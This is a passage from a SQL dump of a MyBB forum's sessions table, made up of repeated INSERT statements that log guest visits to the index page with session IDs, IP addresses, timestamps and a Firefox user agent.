6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('103a114c2b0c4e6c018ac9ba8f1a2d16', '0', '120.130.101.196', '1352770821', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('59f447e7e3e4f4590a3591915e52ae02', '0', '92.149.166.74', '1352770823', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1d6c765383398bb42c9e6f3dade2505b', '0', '220.138.79.169', '1352770824', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f348dfbe58fa56da6f14636917ef28f', '0', '116.133.184.12', '1352770825', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8c9ab292f36b3b8e48f86a389a12fc08', '0', '233.134.39.64', '1352770826', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4cb8320d7cca5c0fd54f369ae82dd0f3', '0', '192.164.64.97', '1352770827', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69c19fa26226e386b7f35e93ec3a51a4', '0', '36.203.140.216', '1352770828', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4ce0139137b896f4c8e59f89281f19fe', '0', '78.51.26.112', '1352770830', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('64c2362a198a75d7b4fe230bf917eb59', '0', '176.96.254.90', '1352770831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c1e27e15aa3b016740e50dca1f2cd1a7', '0', '38.145.100.152', '1352770835', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8c0aee0f25467d661b46503abe3825df', '0', '50.219.195.252', '1352770840', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b6ba56dda944da640cba6667f84c107', '0', '92.19.235.43', '1352770841', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c89bd72472acda1e01248d47c40f016', '0', '1.73.27.176', '1352770842', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c0b3f72fa98e8e464f6df115b64617e', '0', '24.52.245.30', '1352770845', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ed5165f6ec15caf03dccff654359a57', '0', '168.67.74.143', '1352770845', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a41064139015201d8815b0c9c37c6b5', '0', '233.169.96.137', '1352770846', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c95f0fe28b07ba08db29c537fc8111b2', '0', '203.120.93.214', '1352770847', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0ee88dd68ca69ad9a602eacd6e249300', '0', '208.69.152.43', '1352770847', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('81562e1ef7af75aa0b63790d845159d4', '0', '86.190.143.216', '1352770848', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3667638cf99ba7ab465459a68caea417', '0', '80.122.158.2', '1352770849', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5973e2df15cb10f3e9194996d2cd6b7', '0', '122.183.214.52', '1352770849', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a628b68431f8e7fb44133e1e75a5265d', '0', '87.66.96.173', '1352770850', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49af9b9e9c7e561b7297e02d4fb36a4c', '0', '41.240.7.191', '1352770851', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1253ef5a0596882b6a1d948b42b77b2a', '0', '41.179.189.4', '1352770851', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('29634775e1cbf8c048c9a49cf5190243', '0', '225.80.115.201', '1352770852', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ad25e60673db41e5a4cdfe5c9ffcb28', '0', '182.83.31.196', '1352770853', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf25772f6900aef46f64b014c7d8ea39', '0', '73.227.188.210', '1352770855', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d73f6d33b8ac0b36d54f42c91b973561', '0', '63.19.205.222', '1352770855', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d9a0bc6f53dece6db1d3b128ac09e51', '0', '179.151.142.5', '1352770860', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('db0c96aa31007f84109dda28c3f4308f', '0', '241.35.135.118', '1352770861', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55bcaa02358ee12875fdd69ef444362a', '0', '36.237.45.63', '1352770863', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('560fb60def3088e8a485b5ef752d1881', '0', '173.153.37.156', '1352770863', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6a8c51215850257eff405e4267479dac', '0', '109.96.192.229', '1352770864', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aa1866b6ff45499d2bbe4299e06a17a5', '0', '76.19.147.76', '1352770866', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff9417142906ebbde86e78a80e5ec1f3', '0', '84.23.172.161', '1352770866', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a1fd3ece8e07e896381fe88378a9040a', '0', '18.107.65.106', '1352770867', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e081b4cd2028cc42d74ea65c97e9e5a', '0', '254.239.20.153', '1352770868', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ac9ef7b0be3ca00872a8ec579eb7039a', '0', '0.132.206.172', '1352770869', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('faac9b2e8c25a09649cc580b0c1b24ec', '0', '151.222.240.26', '1352770869', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27202a80c39fa18fd5e026d347a859d4', '0', '69.249.128.30', '1352770870', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9fca3255eca64981e34433debdc4c5f6', '0', '237.249.233.96', '1352770871', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fe309522befaa5cc4028d29031052dfd', '0', '93.204.184.132', '1352770872', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('34d5d02fcce1346660300c7230c8f2fb', '0', '193.25.7.115', '1352770873', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea793e9414db4f62f0a099545ea17b9c', '0', '247.92.118.147', '1352770877', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ade92836a03dcb805e6b0acc6740cd0c', '0', '34.245.226.133', '1352770878', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55f910c6d18a31105ec9f5ca3f378484', '0', '114.146.90.126', '1352770881', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb2b97eba7aea6273c44932fb6f769ad', '0', '135.195.236.170', '1352770881', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4e94735ef512a202ff0dc8a0806272b4', '0', '35.113.103.197', '1352770882', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('18ee37b99b6925352cc8c4789de75559', '0', '134.65.249.144', '1352770883', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('efd555a71efbf8ef5d9881e0bb65c9d7', '0', '100.54.125.169', '1352770884', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bfedd0d5247d28c30f1069a1bcdabcac', '0', '196.184.169.213', '1352770885', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('40fe4cb85da65d24f2159c08cc0d74e1', '0', '77.226.21.157', '1352770886', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ebb0e91102996b2092e2e41ea01088d', '0', '224.120.62.126', '1352770889', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74e0e42b38839e760f31b7807483f930', '0', '223.26.142.237', '1352770890', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49aadcbc2e8072f2bc1fa7c1ec74e11d', '0', '131.151.248.132', '1352770891', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('510461deadf9cfb2a65265a21a9a5b76', '0', '197.63.4.250', '1352770891', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2dfa8786e2c34c7e229fafed24854f3d', '0', '249.235.151.172', '1352770892', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('afd7edcf140e9497cf65cbc8a18fc2de', '0', '172.184.246.16', '1352770894', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c1e79b014fbd3edf2a747240a5de672', '0', '92.67.232.2', '1352770895', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2362bf2f8b14e4e083a3a2b4a5a2331a', '0', '189.230.77.93', '1352770896', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e3f9f4bb618f7f287b53a0864570969a', '0', '183.93.9.14', '1352770899', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('76f118f7820cd52499600917bb0ad6d1', '0', '169.134.45.239', '1352770900', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4758454fdabd1ea32291b161d9ffdd12', '0', '67.228.199.152', '1352770902', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00f8bbce7caae95963e99512ba46096e', '0', '124.9.44.108', '1352770902', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('85963877e4ecf24c9eeb8f82f6c4f9a4', '0', '144.141.129.222', '1352770903', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('45180fe2a8b26dc5a07784bd19980939', '0', '111.32.153.200', '1352770904', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13423e948eda7ffb5aea3275340013a7', '0', '183.4.207.6', '1352770904', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f49649fa1926ace5b03379edc6aa7a21', '0', '138.74.76.187', '1352770909', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('51ed05fba7cd63f5d845b1db9ad12afa', '0', '183.186.194.156', '1352770910', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25f1ca5f45055f88ebf5435e09e38814', '0', '224.193.15.134', '1352770911', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('67caf03e10f97d15fce39c165393b7ff', '0', '205.48.189.99', '1352770912', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('de5d8a1890e997d9e01527b6ee9b3850', '0', '120.183.176.52', '1352770914', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2aad8b5a5d3ec8b0ae4d389efccb6a2d', '0', '8.123.129.77', '1352770916', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('481bd66419e6d9454898ce413153235c', '0', '150.193.26.190', '1352770917', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a9dd7eda5d9bf9d44856893c426d5e9', '0', '22.104.85.96', '1352770919', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a4671a416142db2bd19395b889a0614', '0', '165.203.192.151', '1352770922', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('749f30647b5d25eda08f33af19f81faf', '0', '147.39.5.126', '1352770923', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7321a33b9189aefc0976779d4b1274d7', '0', '183.215.52.71', '1352770924', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e439a1b06a78c2603441bddc963555a0', '0', '222.99.88.32', '1352770925', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', 